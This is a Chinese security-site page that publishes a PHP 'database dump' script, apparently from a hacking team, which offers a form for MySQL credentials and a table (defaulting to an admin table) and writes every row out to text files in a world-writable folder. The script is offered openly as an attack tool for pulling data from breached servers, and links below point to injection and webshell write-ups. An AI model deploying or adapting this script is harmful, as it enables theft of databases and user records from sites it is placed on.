MYSQL_OUTPUT 脱裤(脱库)通用脚本(修正版)

所属分类: 网络安全 / 脚本攻防 阅读数: 188
收藏 0 赞 0 分享

复制代码
代码如下:

<html>
<head>
<title>:: hExI3_Securi7y_TeAm...SCRIPT_FILENAME : <?=$_SERVER["PHP_SELF"]?></title>
<style type="text/css">
.font{
size : 2px;
}
</style>
</head>
<body>
<h4>Mysql Database on Tables to Txt...</h4>
#_E-mail:go_root#Hotmail.com

#_Author:HYrz

--------------------------------------------------------

<form action="" method="POST" name="Submit">
<b>Host: </b> <input type="text" name="host" value="127.0.0.1:3306">

<b> User: </b> <input type="text" name="user" value="root">

<b> Password: </b> <input type="text" name="pass" value="root">

<b>Database Check: </b> <input type="text" name="database" value="phpwms">
<b> Tables is: </b> <input type="text" name="table" value="pw_admin">

<b>New_Data Filename:</b> <input type="text" name="back_file" value="data.txt">


<a href = "https://www.jb51.net">脚本之家</a>

<input type="submit" name="submit" value="0utPut">

</form>
</body>
<?php
ini_set('display_errors', 1);
set_time_limit(0);
//error_reporting(E_ALL);
function ShowMessage($Str)
{
$FILENAME = $_SERVER["PHP_SELF"];
Die('<script>document.write("'.$Str.'")</script>');
Die('<script>window.localtion="'.$FILENAME.'";</script>');
}
function _Printf($Str, $type = '')
{
if (empty($type))
echo '<font color="red" face="verdana" size="2px">[+]&nbsp'.$Str.'</font>
';
else
echo '<font color="red" face="verdana" size="2px">[#] '.$Str.'</font>
';
}
function dirsize($dir) {
@$dh = opendir($dir);
$size = 0;
while ($file = @readdir($dh)) {
if ($file != "." and $file != "..") {
$path = $dir."/".$file;
if (is_dir($path)) {
$size += dirsize($path);
} elseif (is_file($path)) {
$size += filesize($path);
}
}
}
@closedir($dh);
return $size;
}
if (empty($_POST['submit'])) exit();
$db_host = $_POST["host"];
$db_user = $_POST["user"];
$db_pass = $_POST["pass"];
$db_database = $_POST["database"];
$db_table = $_POST["table"];
$backDB_Filename = $_POST["back_file"];
//endPost
if (empty($db_host)){
$_POST["host"] = $db_host;
ShowMessage("Messagebox: Host Error!");
}elseif (empty($db_user)) {
$_POST["user"] = $db_user;
ShowMessage("Messagebox: User Error!");
}elseif (empty($db_pass)){
$_POST["pass"] = $db_pass;
ShowMessage("Messagebox: Pass Error!");
}elseif (empty($db_database)) {
$_POST["database"] = $db_database;
ShowMessage("Messagebox: Database Error!");
}elseif (empty($db_table)) {
$_POST["table"] = $db_table;
ShowMessage("Messagebox: table Error!");
}elseif (empty($backDB_Filename)) {
$_POST["back_file"] = $backDB_Filename;
ShowMessage("Messagebox: backDB_Filename Error!");
} #endif
if (!is_dir('data_xiaosan')) {
mkdir('data_xiaosan',0777);
}#endif
$sql = mysql_connect($db_host,$db_user,$db_pass) or ShowMessage('<font color="red" Size=2px>[#] connect Error ! </font>');
mysql_select_db($db_database,$sql) or die("Could not connect: " . mysql_error());
$result = mysql_query("SELECT * FROM $db_table",$sql) or die("Could not connect: " . mysql_error());
$FieldCount = mysql_query("SELECT CoUnt(*) FrOm $db_table",$sql);
$F_Num = mysql_fetch_row($FieldCount);
_Printf('InforMatIon : --------------','Main');
_Printf("TableCounts :". + $F_Num[0]);
if ($F_Num[0] < 500){
$SuB1 = $F_Num[0] / 2;
} else $SuB1 = 500; //endif
$i = 0;
$tmp = '';
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
$i = $i+1;
$tmp .= implode("::", $row)."\n";
if(!($i%$SuB1)){
$filename_ = 'data_xiaosan/'.intval($i/$SuB1).$backDB_Filename;
file_put_contents($filename_,$tmp);
$tmp = '';
}#endif
}#endwhile
mysql_free_result($result);
mysql_close($sql);
if (dirsize('data_xiaosan')>1){
_Printf("<b>Msg : OutPut_Succ!</b>");}else
_Printf("Err : output fail !"); //endPri
?>
</html>
更多精彩内容其他人还在看

ECSHOP php商城系统过滤不严导致SQL注入漏洞

ECSHOP是一款开源免费的网上商店系统。由专业的开发团队升级维护,为您提供及时高效的技术支持,您还可以根据自己的商务特征对ECSHOP进行定制,增加自己商城的特色功能
收藏 0 赞 0 分享

DEDECMS网站管理系统模板执行漏洞(影响版本v5.6)

DedeCms 基于PHP+MySQL的技术开发,支持Windows、Linux、Unix等多种服务器平台,从2004年开始发布第一个版本开始,至今已经发布了五个大版本
收藏 0 赞 0 分享

网站被SQL注入防范(WebKnight)

分享一下内容篡改式攻击的判断方法、SQL注入攻击的防范、以及被攻击后的补救(数据恢复)相关知识
收藏 0 赞 0 分享

手工注入方法,方便大家测试程序漏洞

手工注入方法,方便大家测试程序漏洞,本人只供学习交流,不建议搞破坏。
收藏 0 赞 0 分享

XSS漏洞报告

对于的用户输入搜索出现XSS漏洞的问题,主要是由于开发人员对XSS了解不足,安全的意识不够造成的。现在让我们来普及一下XSS的一些常识,以后在开发的时候,每当有用户输入的内容时,都要加倍小心
收藏 0 赞 0 分享

PHP Webshell 下的端口反弹方法

phpspy2011 中的 Back Connect 怎么弄都不能反弹回来,在网上找了段代码,测试成功了,但自己看了下,这段代码貌似也是从 phpspy 中分离出来的
收藏 0 赞 0 分享

万博企业网站管理系统注入漏洞(MemberLogin.asp)

这个注入漏洞发生在html/MemberLogin.asp文件里,在Include下有NoSqlHack.Asp文件也没调用,呵呵,就有了我们利用的地方了
收藏 0 赞 0 分享

PJBlog3 V3.2.8.352文件Action.asp修改任意用户密码

PJBlog一套开源免费的中文个人博客系统程序,采用asp+Access的技术,具有相当高的运作效能以及更新率,也支持目前Blog所使用的新技术
收藏 0 赞 0 分享

mysql注入导库脚本代码

mysql注入导库脚本代码,学习安全的朋友要注意防范。
收藏 0 赞 0 分享

BOSSI 公司企业网站管理系统注入&上传漏洞利用

BOSSI 公司(企业)网站管理系统,中英文双语版,后台在同一页内同时管理添加修改资料内的中英文内容,网站的左边栏使用了模块,可以自由的增加&删除,可以不用修改代码
收藏 0 赞 0 分享
查看更多